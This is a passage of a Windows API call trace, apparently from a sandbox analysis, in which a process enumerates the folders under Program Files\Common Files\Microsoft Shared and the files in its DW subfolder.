ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0042.048] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0042.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0042.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0042.048] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0042.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0042.049] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0042.049] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0042.051] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0042.052] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0042.052] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0042.052] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0042.052] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.052] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0042.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0042.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0042.052] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.052] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.052] CoTaskMemFree (pv=0x4fe370) [0042.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0042.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0042.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0042.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.060] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.060] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0042.060] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0042.060] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0042.061] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.061] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0042.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0042.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0042.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0042.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0042.061] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0042.062] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, 